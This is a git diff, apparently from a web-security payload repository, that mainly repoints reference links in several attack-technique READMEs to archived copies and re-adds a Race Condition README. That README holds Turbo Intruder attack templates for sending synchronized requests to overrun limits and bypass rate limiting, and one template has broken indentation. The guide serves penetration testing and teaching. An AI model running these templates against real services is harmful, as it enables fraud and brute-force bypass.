+* [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://web.archive.org/web/20240624015518/https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
+* [NoSQL error-based injection - Reino Mostert - March 15, 2025](https://web.archive.org/web/20260208131314/https://sensepost.com/blog/2025/nosql-error-based-injection/)
+* [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://web.archive.org/web/20160916113057/http://zanon.io:80/posts/nosql-injection-in-mongodb)
 * [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
-* [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
+* [Testing for NoSQL injection - OWASP - May 2, 2023](https://web.archive.org/web/20200707120423/https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
diff --git a/OAuth Misconfiguration/README.md b/OAuth Misconfiguration/README.md
index faaa312..b1afa17 100644
--- a/OAuth Misconfiguration/README.md	
+++ b/OAuth Misconfiguration/README.md	
@@ -74,8 +74,8 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
 
 ## References
 
-- [All your Paypal OAuth tokens belong to me - asanso - November 28, 2016](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
-- [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - asanso - April 8, 2014](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
-- [How I hacked Github again - Egor Homakov - February 7, 2014](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
-- [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka - September 16, 2014](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
-- [Bypassing Google Authentication on Periscope's Administration Panel - Jack Whitton - July 20, 2015](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/)
+- [All your Paypal OAuth tokens belong to me - asanso - November 28, 2016](https://web.archive.org/web/20161130191804/http://blog.intothesymmetry.com:80/2016/11/all-your-paypal-tokens-belong-to-me.html)
+- [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - asanso - April 8, 2014](https://web.archive.org/web/20140411210456/http://intothesymmetry.blogspot.ch:80/2014/04/oauth-2-how-i-have-hacked-facebook.html)
+- [How I hacked Github again - Egor Homakov - February 7, 2014](https://web.archive.org/web/20140302195803/http://homakov.blogspot.ch:80/2014/02/how-i-hacked-github-again.html)
+- [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka - September 16, 2014](https://web.archive.org/web/20151221013410/http://andrisatteka.blogspot.ch:80/2014/09/how-microsoft-is-giving-your-data-to.html)
+- [Bypassing Google Authentication on Periscope's Administration Panel - Jack Whitton - July 20, 2015](https://web.archive.org/web/20250113205505/https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/)
diff --git a/ORM Leak/README.md b/ORM Leak/README.md
index c14ace8..a1f016b 100644
--- a/ORM Leak/README.md	
+++ b/ORM Leak/README.md	
@@ -225,10 +225,10 @@ Only in Ransack < `4.0.0`.
 
 ## References
 
-* [ORM Injection - HackTricks - July 30, 2024](https://book.hacktricks.xyz/pentesting-web/orm-injection)
-* [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://pentesterlab.com/blog/orm-leak-with-sqlite3)
-* [ORM Leaking More Than You Joined For - Alex Brown - December 18, 2025](https://www.elttam.com/blog/leaking-more-than-you-joined-for/)
-* [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://www.elttam.com/blog/plormbing-your-django-orm/)
-* [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://www.elttam.com/blog/plorming-your-primsa-orm/)
-* [QuerySet API reference - Django - August 8, 2024](https://docs.djangoproject.com/en/5.1/ref/models/querysets/)
-* [Ransacking your password reset tokens - Lukas Euler - January 26, 2023](https://positive.security/blog/ransack-data-exfiltration)
+* [ORM Injection - HackTricks - July 30, 2024](https://web.archive.org/web/20241230091620/https://book.hacktricks.xyz/pentesting-web/orm-injection)
+* [ORM Leak Exploitation Against SQLite - Louis Nyffenegger - July 30, 2024](https://web.archive.org/web/20260118225011/https://pentesterlab.com/blog/orm-leak-with-sqlite3)
+* [ORM Leaking More Than You Joined For - Alex Brown - December 18, 2025](https://web.archive.org/web/20251218130815/https://www.elttam.com/blog/leaking-more-than-you-joined-for/)
+* [plORMbing your Django ORM - Alex Brown - June 24, 2024](https://web.archive.org/web/20240624071414/https://www.elttam.com/blog/plormbing-your-django-orm/)
+* [plORMbing your Prisma ORM with Time-based Attacks - Alex Brown - July 9, 2024](https://web.archive.org/web/20240709043351/https://www.elttam.com/blog/plorming-your-primsa-orm/)
+* [QuerySet API reference - Django - August 8, 2024](https://web.archive.org/web/20240625055642/https://docs.djangoproject.com/en/5.1/ref/models/querysets/)
+* [Ransacking your password reset tokens - Lukas Euler - January 26, 2023](https://web.archive.org/web/20251211204930/https://positive.security/blog/ransack-data-exfiltration)
diff --git a/Open Redirect/README.md b/Open Redirect/README.md
index 0abc64b..90426d1 100644
--- a/Open Redirect/README.md	
+++ b/Open Redirect/README.md	
@@ -177,9 +177,9 @@ window.location = redirectTo;
 
 ## References
 
-* [Host/Split Exploitable Antipatterns in Unicode Normalization - Jonathan Birch - August 3, 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
-* [Open Redirect Cheat Sheet - PentesterLand - November 2, 2018](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
-* [Open Redirect Vulnerability - s0cket7 - August 15, 2018](https://s0cket7.com/open-redirect-vulnerability/)
+* [Host/Split Exploitable Antipatterns in Unicode Normalization - Jonathan Birch - August 3, 2019](https://web.archive.org/web/20190819081715/https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
+* [Open Redirect Cheat Sheet - PentesterLand - November 2, 2018](https://web.archive.org/web/20190719012735/https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
+* [Open Redirect Vulnerability - s0cket7 - August 15, 2018](https://web.archive.org/web/20180816184136/https://s0cket7.com/open-redirect-vulnerability/)
 * [Open-Redirect-Payloads - Predrag Cujanović - April 24, 2017](https://github.com/cujanovic/Open-Redirect-Payloads)
-* [Unvalidated Redirects and Forwards Cheat Sheet - OWASP - February 28, 2024](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
+* [Unvalidated Redirects and Forwards Cheat Sheet - OWASP - February 28, 2024](https://web.archive.org/web/20130423163025/https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
 * [You do not need to run 80 reconnaissance tools to get access to user accounts - Stefano Vettorazzi (@stefanocoding) - May 16, 2019](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
diff --git a/Prompt Injection/README.md b/Prompt Injection/README.md
index c6496ee..d5c2c42 100644
--- a/Prompt Injection/README.md	
+++ b/Prompt Injection/README.md	
@@ -201,14 +201,14 @@ Examples of Indirect Prompt medium:
 ## References
 
 * [Brex's Prompt Engineering Guide - Brex - April 21, 2023](https://github.com/brexhq/prompt-engineering)
-* [ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data - wunderwuzzi23 - May 28, 2023](https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./)
-* [ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery - wunderwuzzi23 - May 16, 2023](https://embracethered.com/blog/posts/2023/chatgpt-webpilot-data-exfil-via-markdown-injection/)
-* [ChatGPT: Hacking Memories with Prompt Injection - wunderwuzzi - May 22, 2024](https://embracethered.com/blog/posts/2024/chatgpt-hacking-memories/)
-* [Demystifying RCE Vulnerabilities in LLM-Integrated Apps - Tong Liu, Zizhuang Deng, Guozhu Meng, Yuekang Li, Kai Chen - October 8, 2023](https://arxiv.org/pdf/2309.02926)
-* [From Theory to Reality: Explaining the Best Prompt Injection Proof of Concept - Joseph Thacker (rez0) - May 19, 2023](https://rez0.blog/hacking/2023/05/19/prompt-injection-poc.html)
-* [Language Models are Few-Shot Learners - Tom B Brown - May 28, 2020](https://arxiv.org/abs/2005.14165)
+* [ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data - wunderwuzzi23 - May 28, 2023](https://web.archive.org/web/20230528203454/https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./)
+* [ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery - wunderwuzzi23 - May 16, 2023](https://web.archive.org/web/20260128061550/https://embracethered.com/blog/posts/2023/chatgpt-webpilot-data-exfil-via-markdown-injection/)
+* [ChatGPT: Hacking Memories with Prompt Injection - wunderwuzzi - May 22, 2024](https://web.archive.org/web/20260301072619/https://embracethered.com/blog/posts/2024/chatgpt-hacking-memories/)
+* [Demystifying RCE Vulnerabilities in LLM-Integrated Apps - Tong Liu, Zizhuang Deng, Guozhu Meng, Yuekang Li, Kai Chen - October 8, 2023](https://web.archive.org/web/20231115191947/https://arxiv.org/pdf/2309.02926)
+* [From Theory to Reality: Explaining the Best Prompt Injection Proof of Concept - Joseph Thacker (rez0) - May 19, 2023](https://web.archive.org/web/20230702043745/https://rez0.blog/hacking/2023/05/19/prompt-injection-poc.html)
+* [Language Models are Few-Shot Learners - Tom B Brown - May 28, 2020](https://web.archive.org/web/20260306044348/https://arxiv.org/abs/2005.14165)
 * [Large Language Model Prompts (RTC0006) - HADESS/RedTeamRecipe - March 26, 2023](http://web.archive.org/web/20230529085349/https://redteamrecipe.com/Large-Language-Model-Prompts/)
 * [LLM Hacker's Handbook - Forces Unseen - March 7, 2023](https://doublespeak.chat/#/handbook)
-* [Prompt Injection Attacks for Dummies - Devansh Batham - Mar 2, 2025](https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
-* [The AI Attack Surface Map v1.0 - Daniel Miessler - May 15, 2023](https://danielmiessler.com/blog/the-ai-attack-surface-map-v1-0/)
-* [You shall not pass: the spells behind Gandalf - Max Mathys and Václav Volhejn - June 2, 2023](https://www.lakera.ai/insights/who-is-gandalf)
+* [Prompt Injection Attacks for Dummies - Devansh Batham - Mar 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
+* [The AI Attack Surface Map v1.0 - Daniel Miessler - May 15, 2023](https://web.archive.org/web/20251212164354/https://danielmiessler.com/blog/the-ai-attack-surface-map-v1-0)
+* [You shall not pass: the spells behind Gandalf - Max Mathys and Václav Volhejn - June 2, 2023](https://web.archive.org/web/20230605141849/https://www.lakera.ai/insights/who-is-gandalf)
diff --git a/Prototype Pollution/README.md b/Prototype Pollution/README.md
index 7c24fcf..8108f74 100644
--- a/Prototype Pollution/README.md	
+++ b/Prototype Pollution/README.md	
@@ -174,18 +174,18 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder
 
 ## References
 
-* [A Pentester's Guide to Prototype Pollution Attacks - Harsh Bothra - January 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
-* [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us - September 28, 2021](https://blog.s1r1us.ninja/research/PP)
-* [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://www.intruder.io/research/server-side-prototype-pollution)
-* [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michał Bentkowski - October 30, 2019](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
-* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes - March 27, 2023](https://youtu.be/LD-KcuKM_0M)
-* [NodeJS - \_\_proto\_\_ & prototype Pollution - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
-* [Prototype Pollution - PortSwigger - November 10, 2022](https://portswigger.net/web-security/prototype-pollution)
-* [Prototype pollution - Snyk - August 19, 2023](https://learn.snyk.io/lessons/prototype-pollution/javascript/)
-* [Prototype pollution and bypassing client-side HTML sanitizers - Michał Bentkowski - August 18, 2020](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
+* [A Pentester's Guide to Prototype Pollution Attacks - Harsh Bothra - January 2, 2023](https://web.archive.org/web/20260111201021/https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
+* [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us - September 28, 2021](https://web.archive.org/web/20260204200448/https://blog.s1r1us.ninja/research/PP)
+* [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://web.archive.org/web/20230221012320/https://www.intruder.io/research/server-side-prototype-pollution)
+* [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michał Bentkowski - October 30, 2019](https://web.archive.org/web/20250810040511/https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
+* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes - March 27, 2023](https://web.archive.org/web/20230327103116/https://youtu.be/LD-KcuKM_0M)
+* [NodeJS - \_\_proto\_\_ & prototype Pollution - HackTricks - July 19, 2024](https://web.archive.org/web/20241224163723/https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution)
+* [Prototype Pollution - PortSwigger - November 10, 2022](https://web.archive.org/web/20221110144930/https://portswigger.net/web-security/prototype-pollution)
+* [Prototype pollution - Snyk - August 19, 2023](https://web.archive.org/web/20211010192146/https://learn.snyk.io/lessons/prototype-pollution/javascript/)
+* [Prototype pollution and bypassing client-side HTML sanitizers - Michał Bentkowski - August 18, 2020](https://web.archive.org/web/20200908002825/https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
 * [Prototype Pollution and Where to Find Them - BitK & SakiiR - August 14, 2023](https://youtu.be/mwpH9DF_RDA)
 * [Prototype Pollution Attacks in NodeJS - Olivier Arteau - May 16, 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)
-* [Prototype Pollution Attacks in NodeJS applications - Olivier Arteau - October 3, 2018](https://youtu.be/LUsiFV3dsK8)
-* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov - September 29, 2023](https://youtu.be/v5dq80S1WF4)
+* [Prototype Pollution Attacks in NodeJS applications - Olivier Arteau - October 3, 2018](https://web.archive.org/web/20190218093454/https://youtu.be/LUsiFV3dsK8)
+* [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov - September 29, 2023](https://web.archive.org/web/20240416043553/https://youtu.be/v5dq80S1WF4)
 * [Server side prototype pollution, how to detect and exploit - BitK - February 18, 2023](http://web.archive.org/web/20230218081534/https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
-* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - February 15, 2023](https://portswigger.net/research/server-side-prototype-pollution)
+* [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - February 15, 2023](https://web.archive.org/web/20260219234352/https://portswigger.net/research/server-side-prototype-pollution)
diff --git a/Race Condition/README.md b/Race Condition/README.md
index 5dcfcc9..1c10cb8 100644
--- a/Race Condition/README.md	
+++ b/Race Condition/README.md	
@@ -1,165 +1,165 @@
-# Race Condition
-
-> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.
-
-## Summary
-
-- [Tools](#tools)
-- [Methodology](#methodology)
-    - [Limit-overrun](#limit-overrun)
-    - [Rate-limit Bypass](#rate-limit-bypass)
-- [Techniques](#techniques)
-    - [HTTP/1.1 Last-byte Synchronization](#http11-last-byte-synchronization)
-    - [HTTP/2 Single-packet Attack](#http2-single-packet-attack)
-- [Turbo Intruder](#turbo-intruder)
-    - [Example 1](#example-1)
-    - [Example 2](#example-2)
-- [Labs](#labs)
-- [References](#references)
-
-## Tools
-
-- [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
-- [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use.
-- [nxenon/h2spacex](https://github.com/nxenon/h2spacex) - HTTP/2 Single Packet Attack low Level Library / Tool based on Scapy‌ + Exploit Timing Attacks
-
-## Methodology
-
-### Limit-overrun
-
-Limit-overrun refers to a scenario where multiple threads or processes compete to update or access a shared resource, resulting in the resource exceeding its intended limits.
-
-**Examples**: Overdrawing limit, multiple voting, multiple spending of a giftcard.
-
-- [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
-- [Race conditions can be used to bypass invitation limit - @franjkovic](https://hackerone.com/reports/115007)
-- [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609)
-
-### Rate-limit Bypass
-
-Rate-limit bypass occurs when an attacker exploits the lack of proper synchronization in rate-limiting mechanisms to exceed intended request limits. Rate-limiting is designed to control the frequency of actions (e.g., API requests, login attempts), but race conditions can allow attackers to bypass these restrictions.
-
-**Examples**: Bypassing anti-bruteforce mechanism and 2FA.
-
-- [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM)
-
-## Techniques
-
-### HTTP/1.1 Last-byte Synchronization
-
-Send every requests except the last byte, then "release" each request by sending the last byte.
-
-Execute a last-byte synchronization using Turbo Intruder
-
-```py
-engine.queue(request, gate='race1')
-engine.queue(request, gate='race1')
-engine.openGate('race1')
-```
-
-**Examples**:
-
-- [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style)
-
-### HTTP/2 Single-packet Attack
-
-In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter.
-
-- [PortSwigger/turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py)
-- Burp Suite
-    - Send a request to Repeater
-    - Duplicate the request 20 times (CTRL+R)
-    - Create a new group and add all the requests
-    - Send group in parallel (single-packet attack)
-
-**Examples**:
-
-- [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE)
-
-## Turbo Intruder
-
-### Example 1
-
-1. Send request to turbo intruder
-2. Use this python code as a payload of the turbo intruder
-
-   ```python
-   def queueRequests(target, wordlists):
-       engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=30,
-                           requestsPerConnection=30,
-                           pipeline=False
-                           )
-
-   for i in range(30):
-       engine.queue(target.req, i)
-           engine.queue(target.req, target.baseInput, gate='race1')
-
-
-       engine.start(timeout=5)
-   engine.openGate('race1')
-
-       engine.complete(timeout=60)
-
-
-   def handleResponse(req, interesting):
-       table.add(req)
-   ```
-
-3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
-4. Click "Attack"
-
-### Example 2
-
-This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
-
-```python
-def queueRequests(target, wordlists):
-    engine = RequestEngine(endpoint=target.endpoint,
-                           concurrentConnections=30,
-                           requestsPerConnection=100,
-                           pipeline=False
-                           )
-    request1 = '''
-POST /target-URI-1 HTTP/1.1
-Host: <REDACTED>
-Cookie: session=<REDACTED>
-
-parameterName=parameterValue
-    '''
-
-    request2 = '''
-GET /target-URI-2 HTTP/1.1
-Host: <REDACTED>
-Cookie: session=<REDACTED>
-    '''
-
-    engine.queue(request1, gate='race1')
-    for i in range(30):
-        engine.queue(request2, gate='race1')
-    engine.openGate('race1')
-    engine.complete(timeout=60)
-def handleResponse(req, interesting):
-    table.add(req)
-```
-
-## Labs
-
-- [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun)
-- [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
-- [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits)
-- [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
-- [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint)
-- [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities)
-- [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction)
-
-## References
-
-- [Beyond the Limit: Expanding single-packet race condition with a first sequence sync for breaking the 65,535 byte limit - @ryotkak - August 2, 2024](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)
-- [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle (@albinowax) - September 15, 2023](https://youtu.be/tKJzsaB1ZvI)
-- [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat - October 6, 2022](https://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf)
-- [New techniques and tools for web race conditions - Emma Stocks - August 10, 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions)
-- [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - April 24, 2018](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
-- [Race conditions on the web - Josip Franjkovic - July 12, 2016](https://www.josipfranjkovic.com/blog/race-conditions-on-web)
-- [Smashing the state machine: the true potential of web race conditions - James Kettle (@albinowax) - August 9, 2023](https://portswigger.net/research/smashing-the-state-machine)
-- [Turbo Intruder: Embracing the billion-request attack - James Kettle (@albinowax) - January 25, 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
+# Race Condition
+
+> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.
+
+## Summary
+
+- [Tools](#tools)
+- [Methodology](#methodology)
+    - [Limit-overrun](#limit-overrun)
+    - [Rate-limit Bypass](#rate-limit-bypass)
+- [Techniques](#techniques)
+    - [HTTP/1.1 Last-byte Synchronization](#http11-last-byte-synchronization)
+    - [HTTP/2 Single-packet Attack](#http2-single-packet-attack)
+- [Turbo Intruder](#turbo-intruder)
+    - [Example 1](#example-1)
+    - [Example 2](#example-2)
+- [Labs](#labs)
+- [References](#references)
+
+## Tools
+
+- [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
+- [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use.
+- [nxenon/h2spacex](https://github.com/nxenon/h2spacex) - HTTP/2 Single Packet Attack low Level Library / Tool based on Scapy‌ + Exploit Timing Attacks
+
+## Methodology
+
+### Limit-overrun
+
+Limit-overrun refers to a scenario where multiple threads or processes compete to update or access a shared resource, resulting in the resource exceeding its intended limits.
+
+**Examples**: Overdrawing limit, multiple voting, multiple spending of a giftcard.
+
+- [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
+- [Race conditions can be used to bypass invitation limit - @franjkovic](https://hackerone.com/reports/115007)
+- [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609)
+
+### Rate-limit Bypass
+
+Rate-limit bypass occurs when an attacker exploits the lack of proper synchronization in rate-limiting mechanisms to exceed intended request limits. Rate-limiting is designed to control the frequency of actions (e.g., API requests, login attempts), but race conditions can allow attackers to bypass these restrictions.
+
+**Examples**: Bypassing anti-bruteforce mechanism and 2FA.
+
+- [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM)
+
+## Techniques
+
+### HTTP/1.1 Last-byte Synchronization
+
+Send every requests except the last byte, then "release" each request by sending the last byte.
+
+Execute a last-byte synchronization using Turbo Intruder
+
+```py
+engine.queue(request, gate='race1')
+engine.queue(request, gate='race1')
+engine.openGate('race1')
+```
+
+**Examples**:
+
+- [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style)
+
+### HTTP/2 Single-packet Attack
+
+In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter.
+
+- [PortSwigger/turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py)
+- Burp Suite
+    - Send a request to Repeater
+    - Duplicate the request 20 times (CTRL+R)
+    - Create a new group and add all the requests
+    - Send group in parallel (single-packet attack)
+
+**Examples**:
+
+- [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE)
+
+## Turbo Intruder
+
+### Example 1
+
+1. Send request to turbo intruder
+2. Use this python code as a payload of the turbo intruder
+
+   ```python
+   def queueRequests(target, wordlists):
+       engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=30,
+                           requestsPerConnection=30,
+                           pipeline=False
+                           )
+
+   for i in range(30):
+       engine.queue(target.req, i)
+           engine.queue(target.req, target.baseInput, gate='race1')
+
+
+       engine.start(timeout=5)
+   engine.openGate('race1')
+
+       engine.complete(timeout=60)
+
+
+   def handleResponse(req, interesting):
+       table.add(req)
+   ```
+
+3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
+4. Click "Attack"
+
+### Example 2
+
+This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
+
+```python
+def queueRequests(target, wordlists):
+    engine = RequestEngine(endpoint=target.endpoint,
+                           concurrentConnections=30,
+                           requestsPerConnection=100,
+                           pipeline=False
+                           )
+    request1 = '''
+POST /target-URI-1 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+
+parameterName=parameterValue
+    '''
+
+    request2 = '''
+GET /target-URI-2 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+    '''
+
+    engine.queue(request1, gate='race1')
+    for i in range(30):
+        engine.queue(request2, gate='race1')
+    engine.openGate('race1')
+    engine.complete(timeout=60)
+def handleResponse(req, interesting):
+    table.add(req)
+```
+
+## Labs
+
+- [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun)
+- [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
+- [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits)
+- [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
+- [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint)
+- [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities)
+- [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction)
+
+## References
+
+- [Beyond the Limit: Expanding single-packet race condition with a first sequence sync for breaking the 65,535 byte limit - @ryotkak - August 2, 2024](https://web.archive.org/web/20251116040307/https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)
+- [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle (@albinowax) - September 15, 2023](https://web.archive.org/web/20231018114533/https://youtu.be/tKJzsaB1ZvI)
+- [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat - October 6, 2022](https://web.archive.org/web/20221006190254/http://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf)
+- [New techniques and tools for web race conditions - Emma Stocks - August 10, 2023](https://web.archive.org/web/20230810160828/https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions)
+- [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - April 24, 2018](https://web.archive.org/web/20260302041740/https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
+- [Race conditions on the web - Josip Franjkovic - July 12, 2016](https://web.archive.org/web/20160712132451/https://www.josipfranjkovic.com/blog/race-conditions-on-web)
+- [Smashing the state machine: the true potential of web race conditions - James Kettle (@albinowax) - August 9, 2023](https://web.archive.org/web/20230809185504/https://portswigger.net/research/smashing-the-state-machine)
